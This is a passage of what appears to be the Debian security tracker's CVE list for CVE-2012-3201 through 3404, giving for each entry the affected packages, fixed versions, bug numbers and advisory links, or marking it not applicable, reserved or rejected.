CVE-2012-3404 [glibc formatted printing vulnerabilities]
	RESERVED
	- eglibc 2.13-35 (low; bug #681473)
	NOTE: http://sourceware.org/bugzilla/show_bug.cgi?id=12445
	NOTE: http://sourceware.org/git/?p=glibc.git;a=commitdiff;h=84a4211850e3d23a9d3a4f3b294752a3b30bc0ff
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=833703
	NOTE: http://www.openwall.com/lists/oss-security/2012/07/11/5
	NOTE: http://www.openwall.com/lists/oss-security/2012/07/11/17
CVE-2012-3403 (Heap-based buffer overflow in the KiSS CEL file format plug-in in GIMP ...)
	- gimp 2.8.2-1 (bug #685397)
CVE-2012-3402 (Integer overflow in plug-ins/common/psd.c in the Adobe Photoshop PSD ...)
	- gimp 2.4.0~rc1-1
	NOTE: Only affects 2.2 series
CVE-2012-3401 (The t2p_read_tiff_init function in tiff2pdf (tools/tiff2pdf.c) in ...)
	{DSA-2552-1}
	- tiff 4.0.2-2 (bug #682115)
	- tiff3 3.9.6-7 (bug #682195)
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=837577
CVE-2012-3400 (Heap-based buffer overflow in the udf_load_logicalvol function in ...)
	- linux 3.2.23-1
	- linux-2.6
	[squeeze] - linux-2.6 2.6.32-36
CVE-2012-3399 (Config/diff.php in Basilic 1.5.14 allows remote attackers to execute ...)
	NOT-FOR-US: Basilic
CVE-2012-3398 (Algorithmic complexity vulnerability in Moodle 1.9.x before 1.9.19, ...)
	- moodle 2.2.3.dfsg-1 (bug #682203)
	[squeeze] - moodle (Minor issue)
CVE-2012-3397 (lib/modinfolib.php in Moodle 2.0.x before 2.0.10, 2.1.x before 2.1.7, ...)
	- moodle 2.2.3.dfsg-2.1 (bug #682203)
	[squeeze] - moodle (Only affects >= 2.0)
CVE-2012-3396 (Cross-site scripting (XSS) vulnerability in cohort/edit_form.php in ...)
	- moodle 2.2.3.dfsg-2.1 (bug #682203)
	[squeeze] - moodle (Only affects >= 2.0)
CVE-2012-3395 (SQL injection vulnerability in mod/feedback/complete.php in Moodle ...)
	- moodle 2.2.3.dfsg-2.1 (bug #682203)
	[squeeze] - moodle (Only affects >= 2.0)
CVE-2012-3394 (auth/ldap/ntlmsso_attempt.php in Moodle 2.0.x before 2.0.10, 2.1.x ...)
	- moodle 2.2.3.dfsg-2.1 (bug #682203)
	[squeeze] - moodle (Only affects >= 2.1)
CVE-2012-3393 (Cross-site scripting (XSS) vulnerability in repository/lib.php in ...)
	- moodle 2.2.3.dfsg-2.1 (bug #682203)
	[squeeze] - moodle (Only affects >= 2.1)
CVE-2012-3392 (mod/forum/unsubscribeall.php in Moodle 2.1.x before 2.1.7 and 2.2.x ...)
	- moodle 2.2.3.dfsg-1 (bug #682203)
	[squeeze] - moodle (Only affects >= 2.1)
CVE-2012-3391 (mod/forum/rsslib.php in Moodle 2.1.x before 2.1.7 and 2.2.x before ...)
	- moodle 2.2.3.dfsg-1 (bug #682203)
	[squeeze] - moodle (Only affects >= 2.1)
CVE-2012-3390 (lib/filelib.php in Moodle 2.1.x before 2.1.7 and 2.2.x before 2.2.4 ...)
	- moodle 2.2.3.dfsg-1 (bug #682203)
	[squeeze] - moodle (Only affects >= 2.1)
CVE-2012-3389 (Multiple cross-site scripting (XSS) vulnerabilities in ...)
	- moodle 2.2.3.dfsg-2.2 (bug #682203)
	[squeeze] - moodle (Only affects >= 2.2)
CVE-2012-3388 (The is_enrolled function in lib/accesslib.php in Moodle 2.2.x before ...)
	- moodle 2.2.3.dfsg-2.2 (bug #682203)
	[squeeze] - moodle (Only affects >= 2.2)
CVE-2012-3387 (Moodle 2.3.x before 2.3.1 uses only a client-side check for whether ...)
	- moodle (Only affects 2.3)
CVE-2012-3386 (The "make distcheck" rule in GNU Automake before 1.11.6 and 1.12.x ...)
	- automake 1:1.4-p6-13.1
	- automake1.10 1:1.10.3-3
	[squeeze] - automake1.10 1:1.10.3-1+squeeze1
	- automake1.11 1:1.11.6-1 (bug #681097)
	[squeeze] - automake1.11 1:1.11.1-1+squeeze1
	- automake1.7 1.7.9-10
	[squeeze] - automake1.7 1.7.9-9.1+squeeze1
	- automake1.9 1.9.6+nogfdl-4
	[squeeze] - automake1.9 1.9.6+nogfdl-3.1+squeeze1
CVE-2012-3385 (WordPress before 3.4.1 does not properly restrict access to post ...)
	- wordpress 3.4.1+dfsg-1 (bug #680721)
	NOTE: http://www.openwall.com/lists/oss-security/2012/07/02/1
	NOTE: http://www.openwall.com/lists/oss-security/2012/07/08/1
CVE-2012-3384 (Cross-site request forgery (CSRF) vulnerability in the customizer in ...)
	- wordpress 3.4.1+dfsg-1 (bug #680721)
	NOTE: http://www.openwall.com/lists/oss-security/2012/07/02/1
	NOTE: http://www.openwall.com/lists/oss-security/2012/07/08/1
CVE-2012-3383 (The map_meta_cap function in wp-includes/capabilities.php in WordPress ...)
	- wordpress 3.4.1+dfsg-1 (bug #680721)
	NOTE: http://www.openwall.com/lists/oss-security/2012/07/02/1
	NOTE: http://www.openwall.com/lists/oss-security/2012/07/08/1
CVE-2012-3382 (Cross-site scripting (XSS) vulnerability in the ProcessRequest ...)
	{DSA-2512-1}
	- mono 2.10.8.1-5 (bug #681095)
	NOTE: https://bugzilla.novell.com/show_bug.cgi?id=769799
	NOTE: https://github.com/mono/mono/commit/d16d4623edb210635bec3ca3786481b82cde25a2
CVE-2012-3381 (sfcb in sblim-sfcb places a zero-length directory name in the ...)
	NOT-FOR-US: sblim-sfcb
	NOTE: https://bugzilla.novell.com/show_bug.cgi?id=770234
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=838160
	NOTE: http://www.openwall.com/lists/oss-security/2012/07/06/7
	NOTE: http://www.openwall.com/lists/oss-security/2012/07/06/8
CVE-2012-3380 (Directory traversal vulnerability in naxsi-ui/nx_extract.py in the ...)
	- nginx 1.2.1-2
	[squeeze] - nginx (naxsi package was introduced in 1.1.18-1)
CVE-2012-3379 [as31: insecure file creation in /tmp]
	REJECTED
CVE-2012-3378 (The register_application function in atk-adaptor/bridge.c in GNOME ...)
	- at-spi2-atk 2.5.3-1 (bug #678026)
CVE-2012-3377 (Heap-based buffer overflow in the Ogg_DecodePacket function in the OGG ...)
	- vlc 2.0.2-1 (bug #680665)
	NOTE: http://git.videolan.org/?p=vlc/vlc-2.0.git;a=commitdiff;h=16e9e126333fb7acb47d363366fee3deadc8331e
	NOTE: http://securitytracker.com/id/1027224
CVE-2012-3376 (DataNodes in Apache Hadoop 2.0.0 alpha does not check the BlockTokens ...)
	- hadoop (bug #535861)
	NOTE: http://seclists.org/bugtraq/2012/Jul/48
CVE-2012-3375 (The epoll_ctl system call in fs/eventpoll.c in the Linux kernel before ...)
	- linux 3.2.23-1
	- linux-2.6 (Introduced in 3.2)
CVE-2012-3374 (Buffer overflow in markup.c in the MXit protocol plugin in libpurple ...)
	{DSA-2509-1}
	- pidgin 2.10.6-1 (bug #680661)
	[squeeze] - pidgin 2.7.3-1+squeeze3
	NOTE: http://www.pidgin.im/news/security/index.php?id=64
	NOTE: http://hg.pidgin.im/pidgin/main/rev/ded93865ef42
CVE-2012-3373 (Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before ...)
	NOT-FOR-US: Apache Wicket
CVE-2012-3372 (** DISPUTED ** The default configuration of Cyberoam UTM appliances ...)
	NOT-FOR-US: Cyberoam DPI devices
	NOTE: https://blog.torproject.org/blog/security-vulnerability-found-cyberoam-dpi-devices-cve-2012-3372
	NOTE: http://seclists.org/bugtraq/2012/Jul/20
CVE-2012-3371 (The Nova scheduler in OpenStack Compute (Nova) Folsom (2012.2) and ...)
	- nova 2012.1.1-5 (bug #681301)
	NOTE: http://www.openwall.com/lists/oss-security/2012/07/11/13
	NOTE: https://github.com/openstack/nova/commit/034762e8060dcf0a11cb039b9d426b0d0bb1801d
	NOTE: https://github.com/openstack/nova/commit/25f5bd31805bd21d7b7e3583c775252aa8f737e9
	NOTE: https://bugs.launchpad.net/nova/+bug/1017795
CVE-2012-3370 (The SecurityAssociation.getCredential method in JBoss Enterprise ...)
	- jbossas4 (Only builds a few libraries, not the full application server, #581226)
CVE-2012-3369 (The CallerIdentityLoginModule in JBoss Enterprise Application Platform ...)
	- jbossas4 (Only builds a few libraries, not the full application server, #581226)
CVE-2012-3368 (Integer signedness error in attach.c in dtach 0.8 allows remote ...)
	- dtach 0.8-2.1 (low; bug #625302)
	[squeeze] - dtach 0.8-2+squeeze1
	NOTE: http://sourceforge.net/tracker/?func=detail&aid=3517812&group_id=36489&atid=417357
	NOTE: http://sourceforge.net/tracker/download.php?group_id=36489&atid=417357&file_id=441195&aid=3517812
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=812551
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=835849
CVE-2012-3367 (Red Hat Certificate System (RHCS) before 8.1.1 and Dogtag Certificate ...)
	NOT-FOR-US: Red Hat Certificate System
CVE-2012-3366 (The Trigger plugin in bcfg2 1.2.x before 1.2.3 allows remote attackers ...)
	{DSA-2503-1}
	- bcfg2 1.2.2-2 (bug #679272)
CVE-2012-3365 (The SQLite functionality in PHP before 5.3.15 allows remote attackers ...)
	- php5 (unimportant)
	NOTE: open_basedir not supported
CVE-2012-3364 (Multiple stack-based buffer overflows in the Near Field Communication ...)
	- linux 3.2.23-1
	[squeeze] - linux-2.6 (Vulnerable code not present)
CVE-2012-3363 (Zend_XmlRpc in Zend Framework 1.x before 1.11.12 and 1.12.x before ...)
	{DSA-2505-1}
	- zendframework 1.11.12-1 (bug #679215)
	- moodle (bug #703870)
	[squeeze] - moodle (Vulnerable code not present)
CVE-2012-3362 (Cross-site request forgery (CSRF) vulnerability in eXtplorer 2.1 RC3 ...)
	{DSA-2510-1}
	- extplorer 2.1.0b6+dfsg.3-3 (bug #678737)
CVE-2012-3361 (virt/disk/api.py in OpenStack Compute (Nova) Folsom (2012.2), Essex ...)
	- nova 2012.1.1-2 (bug #680110)
CVE-2012-3360 (Directory traversal vulnerability in virt/disk/api.py in OpenStack ...)
	- nova 2012.1.1-2 (bug #680110)
CVE-2012-3359
	RESERVED
	NOT-FOR-US: Red Hat Conga
CVE-2012-3358 (Multiple heap-based buffer overflows in the j2k_read_sot function in ...)
	{DSA-2629-1}
	- openjpeg 1.3+dfsg-4.4 (bug #681075)
	NOTE: http://www.openwall.com/lists/oss-security/2012/07/11/1
	NOTE: Upstream patch: http://code.google.com/p/openjpeg/source/detail?r=1727
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=835767
CVE-2012-3357 (The SVN revision view (lib/vclib/svn/svn_repos.py) in ViewVC before ...)
	{DSA-2563-1}
	- viewvc 1.1.5-1.3 (bug #679069)
	NOTE: http://viewvc.tigris.org/issues/show_bug.cgi?id=353
	NOTE: http://viewvc.tigris.org/source/browse/viewvc?view=rev&revision=2755
	NOTE: http://viewvc.tigris.org/source/browse/viewvc?view=rev&revision=2756
	NOTE: http://viewvc.tigris.org/source/browse/viewvc?view=rev&revision=2757
	NOTE: http://viewvc.tigris.org/source/browse/viewvc?view=rev&revision=2759
	NOTE: http://viewvc.tigris.org/source/browse/viewvc?view=rev&revision=2760
CVE-2012-3356 (The remote SVN views functionality (lib/vclib/svn/svn_ra.py) in ViewVC ...)
	{DSA-2563-1}
	- viewvc 1.1.5-1.3 (bug #679069)
	NOTE: http://viewvc.tigris.org/source/browse/viewvc?view=rev&revision=2758
CVE-2012-3355 ((1) AlbumTab.py, (2) ArtistTab.py, (3) LinksTab.py, and (4) ...)
	- rhythmbox 2.97-2.1 (low; bug #616673)
	[squeeze] - rhythmbox (Minor issue)
	NOTE: Upstream bug report https://bugzilla.gnome.org/show_bug.cgi?id=678661
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=835076
CVE-2012-3354 (doku.php in DokuWiki, as used in Fedora 16, 17, and 18, when certain ...)
	- dokuwiki (unimportant)
	NOTE: http://www.openwall.com/lists/oss-security/2012/06/24/2
CVE-2012-3353
	RESERVED
CVE-2012-3553 (chan_skinny.c in the Skinny (aka SCCP) channel driver in Asterisk Open ...)
	- asterisk (Only affects Asterisk 10)
CVE-2012-3352
	RESERVED
CVE-2012-3351
	RESERVED
CVE-2012-3350 (SQL injection vulnerability in index.php in Webmatic 3.1.1 allows ...)
	NOT-FOR-US: WebMatic
	NOTE: http://seclists.org/bugtraq/2012/Jul/25
CVE-2012-3349
	RESERVED
CVE-2012-3348
	RESERVED
CVE-2012-3347 (AutoFORM PDM Archive before 7.0 implements user accounts in a way that ...)
	NOT-FOR-US: AutoFORM PDM Archive
CVE-2012-3346
	RESERVED
CVE-2012-3345 (ioquake3 before r2253 allows local users to overwrite arbitrary files ...)
	- ioquake3 1.36+svn2224-4
	NOTE: http://www.openwall.com/lists/oss-security/2012/06/15/3
CVE-2012-3344
	RESERVED
CVE-2012-3343 (Cross-site request forgery (CSRF) vulnerability in Microdasys before ...)
	NOT-FOR-US: Microdasys
CVE-2010-5141 (wxBitcoin and bitcoind before 0.3.5 do not properly handle script ...)
	- bitcoin (Fixed before initial release)
CVE-2012-3342 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2012-3341
	RESERVED
CVE-2012-3340
	RESERVED
CVE-2012-3339
	RESERVED
CVE-2012-3338
	RESERVED
CVE-2012-3337
	RESERVED
CVE-2012-3336
	RESERVED
CVE-2012-3335
	RESERVED
CVE-2012-3334 (Stack-based buffer overflow in IBM Informix Dynamic Server (IDS) 11.50 ...)
	NOT-FOR-US: IBM Informix Dynamic Server
CVE-2012-3333
	RESERVED
CVE-2012-3332
	RESERVED
CVE-2012-3331
	RESERVED
CVE-2012-3330 (The proxy server in IBM WebSphere Application Server 7.0 before ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2012-3329 (IBM Advanced Settings Utility (ASU) through 3.62 and 3.70 through 9.21 ...)
	NOT-FOR-US: IBM Advanced Settings Utility, Bootable Media Creator
CVE-2012-3328 (Cross-site scripting (XSS) vulnerability in IBM Maximo Asset ...)
	NOT-FOR-US: IBM
CVE-2012-3327 (Cross-site scripting (XSS) vulnerability in IBM Maximo Asset ...)
	NOT-FOR-US: IBM
CVE-2012-3326 (Cross-site scripting (XSS) vulnerability in IBM Maximo Asset ...)
	NOT-FOR-US: IBM Maximo Asset Management
CVE-2012-3325 (IBM WebSphere Application Server (WAS) 6.1.x before 6.1.0.45, 7.0.x ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2012-3324 (Directory traversal vulnerability in the UTL_FILE module in IBM DB2 ...)
	NOT-FOR-US: IBM DB2
CVE-2012-3323
	RESERVED
CVE-2012-3322 (Cross-site scripting (XSS) vulnerability in IBM Maximo Asset ...)
	NOT-FOR-US: IBM
CVE-2012-3321 (IBM SmartCloud Control Desk 7.5 allows remote authenticated users to ...)
	NOT-FOR-US: IBM
CVE-2012-3320
	RESERVED
CVE-2012-3319 (IBM Rational Business Developer 8.x before 8.0.1.4 allows remote ...)
	NOT-FOR-US: IBM Rational Business Developer
CVE-2012-3318
	RESERVED
CVE-2012-3317 (IBM WebSphere Message Broker 6.1 before 6.1.0.11, 7.0 before 7.0.0.5, ...)
	NOT-FOR-US: IBM WebSphere
CVE-2012-3316 (Cross-site scripting (XSS) vulnerability in the Tivoli Process ...)
	NOT-FOR-US: IBM
CVE-2012-3315 (The Java servlets in the management console in IBM Tivoli Federated ...)
	NOT-FOR-US: IBM Tivoli
CVE-2012-3314 (IBM Tivoli Federated Identity Manager (TFIM) and Tivoli Federated ...)
	NOT-FOR-US: IBM Tivoli
CVE-2012-3313 (Cross-site scripting (XSS) vulnerability in IBM Maximo Asset ...)
	NOT-FOR-US: IBM Maximo Asset Management
CVE-2012-3312 (The datasource definition editor in IBM InfoSphere Guardium 8.2 and ...)
	NOT-FOR-US: IBM InfoSphere Guardium
CVE-2012-3311 (IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.45, 7.0 before ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2012-3310 (IBM Tivoli Federated Identity Manager (TFIM) before 6.1.1.14, 6.2.0 ...)
	NOT-FOR-US: IBM Tivoli
CVE-2012-3309 (Cross-site request forgery (CSRF) vulnerability in the ...)
	NOT-FOR-US: IBM InfoSphere Guardium
CVE-2012-3308 (Cross-site scripting (XSS) vulnerability in IBM Sametime 8.0.2 through ...)
	NOT-FOR-US: IBM Sametime
CVE-2012-3307
	RESERVED
CVE-2012-3306 (IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.45, 7.0 before ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2012-3305 (Directory traversal vulnerability in IBM WebSphere Application Server ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2012-3304 (The Administrative Console in IBM WebSphere Application Server (WAS) ...)
	NOT-FOR-US: IBM WebSphere Application Server
CVE-2012-3303
	RESERVED
CVE-2012-3302 (Multiple cross-site scripting (XSS) vulnerabilities in IBM Lotus ...)
	NOT-FOR-US: IBM Lotus Domino
CVE-2012-3301 (Multiple CRLF injection vulnerabilities in the HTTP server in IBM ...)
	NOT-FOR-US: IBM Lotus Domino
CVE-2012-3300 (IBM WebSphere Commerce 7.0 before 7.0.0.6, when persistent sessions ...)
	NOT-FOR-US: IBM WebSphere Commerce
CVE-2012-3299
	RESERVED
CVE-2012-3298 (Unspecified vulnerability in the REST services framework in IBM ...)
	NOT-FOR-US: IBM WebSphere Commerce
CVE-2012-3297 (Cross-site scripting (XSS) vulnerability in the embedded HTTP server ...)
	NOT-FOR-US: IBM Tivoli
CVE-2012-3296 (Cross-site scripting (XSS) vulnerability in the Help link in the login ...)
	NOT-FOR-US: IBM Power Hardware Management Console
CVE-2012-3295 (IBM WebSphere MQ 7.1, when an SVRCONN channel is used, allows remote ...)
	NOT-FOR-US: IBM WebSphere MQ
CVE-2012-3294 (Multiple cross-site request forgery (CSRF) vulnerabilities in the Web ...)
	NOT-FOR-US: IBM WebSphere
CVE-2012-3293 (Cross-site scripting (XSS) vulnerability in the Administrative Console ...)
	NOT-FOR-US: IBM WebSphere
CVE-2012-3292 (The GridFTP in Globus Toolkit (GT) before 5.2.2, when certain autoconf ...)
	{DSA-2523-1}
	- globus-gridftp-server 6.5-1
CVE-2012-3291 (Heap-based buffer overflow in OpenConnect 3.18 allows remote servers ...)
	{DSA-2495-1}
	- openconnect 3.18-1 (bug #677594)
CVE-2012-3290 (Multiple unspecified vulnerabilities in Google Chrome before ...)
	NOT-FOR-US: Chrome books
CVE-2012-3289 (VMware Workstation 8.x before 8.0.4, VMware Player 4.x before 4.0.4, ...)
	NOT-FOR-US: VMware
CVE-2012-3288 (VMware Workstation 7.x before 7.1.6 and 8.x before 8.0.4, VMware ...)
	NOT-FOR-US: VMware
CVE-2012-3287 (Poul-Henning Kamp md5crypt has insufficient algorithmic complexity and ...)
	NOT-FOR-US: md5crypt
CVE-2012-3286 (Unspecified vulnerability in HP ArcSight Connector Appliance 6.3 and ...)
	NOT-FOR-US: HP ArcSight appliance
CVE-2012-3285 (Unspecified vulnerability on the HP LeftHand Virtual SAN Appliance ...)
	NOT-FOR-US: HP LeftHand Virtual SAN Appliance
CVE-2012-3284 (Unspecified vulnerability on the HP LeftHand Virtual SAN Appliance ...)
	NOT-FOR-US: HP LeftHand Virtual SAN Appliance
CVE-2012-3283 (Unspecified vulnerability on the HP LeftHand Virtual SAN Appliance ...)
	NOT-FOR-US: HP LeftHand Virtual SAN Appliance
CVE-2012-3282 (Unspecified vulnerability on the HP LeftHand Virtual SAN Appliance ...)
	NOT-FOR-US: HP LeftHand Virtual SAN Appliance
CVE-2012-3281 (Unspecified vulnerability in Device Manager in HP XP P9000 Command ...)
	NOT-FOR-US: HP XP P9000 Command View
CVE-2012-3280 (Multiple unspecified vulnerabilities on HP NonStop Servers H06.x and ...)
	NOT-FOR-US: HP NonStop Servers
CVE-2012-3279 (Multiple cross-site scripting (XSS) vulnerabilities in HP Network Node ...)
	NOT-FOR-US: HP Network Node Manager i
CVE-2012-3278 (Stack-based buffer overflow in magentservice.exe in HP Diagnostics ...)
	NOT-FOR-US: HP Diagnostics Server
CVE-2012-3277 (HP OpenVMS 8.3, 8.3-1H1, and 8.4 on the Itanium platform and 7.3-2, ...)
	NOT-FOR-US: HP OpenVMS
CVE-2012-3276 (HP OpenVMS 8.3, 8.3-1H1, and 8.4 on the Itanium platform and 7.3-2, ...)
	NOT-FOR-US: HP OpenVMS
CVE-2012-3275 (Unspecified vulnerability in HP Network Node Manager i (NNMi) 9.1x and ...)
	NOT-FOR-US: HP Network Node Manager
CVE-2012-3274 (Stack-based buffer overflow in uam.exe in the User Access Manager ...)
	NOT-FOR-US: HP Intelligent Management Center
CVE-2012-3273 (Multiple unspecified vulnerabilities on the HP LaserJet Pro 400 MFP ...)
	NOT-FOR-US: HP LaserJet
CVE-2012-3272 (Cross-site scripting (XSS) vulnerability on the HP Color LaserJet ...)
	NOT-FOR-US: HP LaserJet
CVE-2012-3271 (Unspecified vulnerability on the HP Integrated Lights-Out 3 (aka iLO3) ...)
	NOT-FOR-US: HP ILO
CVE-2012-3270 (Unspecified vulnerability in HP Performance Insight 5.31, 5.40, and ...)
	NOT-FOR-US: HP Performance Insight
CVE-2012-3269 (Unspecified vulnerability in HP Performance Insight 5.31, 5.40, and ...)
	NOT-FOR-US: HP Performance Insight
CVE-2012-3268 (Certain HP Access Controller, Fabric Module, Firewall, Router, Switch, ...)
	NOT-FOR-US: HP network devices
CVE-2012-3267 (Unspecified vulnerability in HP Network Node Manager i (NNMi) 9.20 ...)
	NOT-FOR-US: HP NNMi
CVE-2012-3266 (Unspecified vulnerability in IBRIX 6.1.196 through 6.1.251 on HP IBRIX ...)
	NOT-FOR-US: HP IBRIX
CVE-2012-3265
	RESERVED
CVE-2012-3264 (Unspecified vulnerability in a SOAP feature in HP SiteScope 11.10 ...)
	NOT-FOR-US: HP SiteScope
CVE-2012-3263 (Unspecified vulnerability in a SOAP feature in HP SiteScope 11.10 ...)
	NOT-FOR-US: HP SiteScope
CVE-2012-3262 (Unspecified vulnerability in a SOAP feature in HP SiteScope 11.10 ...)
	NOT-FOR-US: HP SiteScope
CVE-2012-3261 (Unspecified vulnerability in a SOAP feature in HP SiteScope 11.10 ...)
	NOT-FOR-US: HP SiteScope
CVE-2012-3260 (Unspecified vulnerability in a SOAP feature in HP SiteScope 11.10 ...)
	NOT-FOR-US: HP SiteScope
CVE-2012-3259 (Unspecified vulnerability in a SOAP feature in HP SiteScope 11.10 ...)
	NOT-FOR-US: HP SiteScope
CVE-2012-3258 (Unspecified vulnerability in HP Operations Orchestration 9.0 before ...)
	NOT-FOR-US: HP Operations Orchestration
CVE-2012-3257 (HP Business Availability Center (BAC) 8.07 allows remote authenticated ...)
	NOT-FOR-US: HP Business Availability Center
CVE-2012-3256 (Cross-site request forgery (CSRF) vulnerability in HP Business ...)
	NOT-FOR-US: HP Business Availability Center
CVE-2012-3255 (Cross-site scripting (XSS) vulnerability in HP Business Availability ...)
	NOT-FOR-US: HP Business Availability Center
CVE-2012-3254 (Multiple unspecified vulnerabilities in HP iNode Management Center ...)
	NOT-FOR-US: HP iNode Management Center
CVE-2012-3253 (Multiple unspecified vulnerabilities in HP Intelligent Management ...)
	NOT-FOR-US: HP Intelligent Management
CVE-2012-3252 (Unspecified vulnerability in HP Serviceguard A.11.19 and A.11.20 ...)
	NOT-FOR-US: HP Serviceguard
CVE-2012-3251 (Cross-site scripting (XSS) vulnerability in HP Service Manager Web ...)
	NOT-FOR-US: HP Service Manager
CVE-2012-3250 (Unspecified vulnerability in HP Service Manager Server 7.11, 9.21, and ...)
	NOT-FOR-US: HP Service Manager
CVE-2012-3249 (HP Fortify Software Security Center 3.1, 3.3, 3.4, and 3.5 allows ...)
	NOT-FOR-US: HP Fortify Software Security Center
CVE-2012-3248 (HP Fortify Software Security Center 3.1, 3.3, 3.4, and 3.5 allows ...)
	NOT-FOR-US: HP Fortify Software Security Center
CVE-2012-3247 (Unspecified vulnerability on the HP Integrity Server BL860c i2, BL870c ...)
	NOT-FOR-US: HP Integrity Server
CVE-2012-3246
	RESERVED
CVE-2012-3245
	RESERVED
CVE-2012-3244
	RESERVED
CVE-2012-3243
	RESERVED
CVE-2012-3242
	RESERVED
CVE-2012-3241 (The VMware Broker in Eucalyptus 2.0.3 and 3.0.x before 3.0.2 does not ...)
	- eucalyptus (Fixed before initial release)
CVE-2012-3240 (The Walrus service in Eucalyptus 2.0.3 and 3.0.x before 3.0.2 allows ...)
	- eucalyptus (Fixed before initial release)
CVE-2012-3239
	RESERVED
CVE-2012-3238 (Cross-site scripting (XSS) vulnerability in the Backup/Restore ...)
	NOT-FOR-US: Astaro appliance
CVE-2012-3237
	RESERVED
CVE-2012-3236 (fits-io.c in GIMP before 2.8.1 allows remote attackers to cause a ...)
	- gimp (unimportant)
	NOTE: Harmless crasher w/o security impact
CVE-2012-3235
	RESERVED
CVE-2012-3234 (RealNetworks RealPlayer before 15.0.6.14, RealPlayer SP 1.0 through ...)
	NOT-FOR-US: RealNetworks RealPlayer
CVE-2012-3233 (Cross-site scripting (XSS) vulnerability in ...)
	NOT-FOR-US: Kayako Fusion 4.40.1148
CVE-2012-3232 (Cross-site scripting (XSS) vulnerability in search.php in web@all 2.0, ...)
	NOT-FOR-US: web@all
CVE-2012-3231 (Multiple cross-site request forgery (CSRF) vulnerabilities in web@all ...)
	NOT-FOR-US: web@all
CVE-2012-3230 (Unspecified vulnerability in the Siebel UI Framework component in ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2012-3229 (Unspecified vulnerability in the Siebel UI Framework component in ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2012-3228 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2012-3227 (Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2012-3226 (Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2012-3225 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2012-3224 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2012-3223 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2012-3222 (Unspecified vulnerability in the Oracle iRecruitment component in ...)
	NOT-FOR-US: Oracle E-Business Suite
CVE-2012-3221 (Unspecified vulnerability in the Oracle VM Virtual Box component in ...)
	{DSA-2594-1}
	- virtualbox 4.1.18-dfsg-1.1 (bug #690777)
	- virtualbox-ose
	NOTE: http://www.halfdog.net/Security/2012/VirtualBoxSoftwareInterrupt0x8GuestCrash/
CVE-2012-3220 (Unspecified vulnerability in the Spatial component in Oracle Database ...)
	NOT-FOR-US: Oracle Database Server
CVE-2012-3219 (Unspecified vulnerability in the Enterprise Manager Base Platform ...)
	NOT-FOR-US: Oracle
CVE-2012-3218 (Unspecified vulnerability in the Human Resources component in Oracle ...)
	NOT-FOR-US: Oracle
CVE-2012-3217 (Unspecified vulnerability in the Oracle Outside In Technology ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2012-3216 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 6b24-1.11.5-0ubuntu1 (bug #690774)
	- openjdk-7 7u3-2.1.3-1 (bug #690774)
CVE-2012-3215 (Unspecified vulnerability in Oracle Sun Solaris 10 and 11, when ...)
	NOT-FOR-US: Oracle Sun Solaris
CVE-2012-3214 (Unspecified vulnerability in the Oracle Outside In Technology ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2012-3213 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Specific to Oracle Java, not present in IcedTea)
	- openjdk-7 (Specific to Oracle Java, not present in IcedTea)
	NOTE: Due to the vague disclosure policy by Oracle the exact nature is unknown but since no patch landed in icedtea, we consider it not-affected
CVE-2012-3212 (Unspecified vulnerability in Oracle Sun Solaris 10 and 11, when ...)
	NOT-FOR-US: Oracle Sun Solaris
CVE-2012-3211 (Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local ...)
	NOT-FOR-US: Oracle Sun Solaris
CVE-2012-3210 (Unspecified vulnerability in Oracle Sun Solaris 11 allows remote ...)
	NOT-FOR-US: Oracle Sun Solaris
CVE-2012-3209 (Unspecified vulnerability in Oracle Sun Solaris 10 and 11, when ...)
NOT-FOR-US: Oracle Sun Solaris CVE-2012-3208 (Unspecified vulnerability in Oracle Sun Solaris 10 and 11 allows local ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3207 (Unspecified vulnerability in Oracle Sun Solaris 9, 10, and 11 allows ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3206 (Unspecified vulnerability in the Integrated Lights Out Manager CLI in ...) NOT-FOR-US: Oracle Sun Products Suite SysFW CVE-2012-3205 (Unspecified vulnerability in Oracle Sun Solaris 11 allows local users ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3204 (Unspecified vulnerability in Oracle Sun Solaris 11 allows local users ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3203 (Unspecified vulnerability in Oracle Sun Solaris 11 allows local users ...) NOT-FOR-US: Oracle Sun Solaris CVE-2012-3202 (Multiple unspecified vulnerabilities in the Oracle JRockit component ...) NOT-FOR-US: Oracle Fusion Middleware CVE-2012-3201 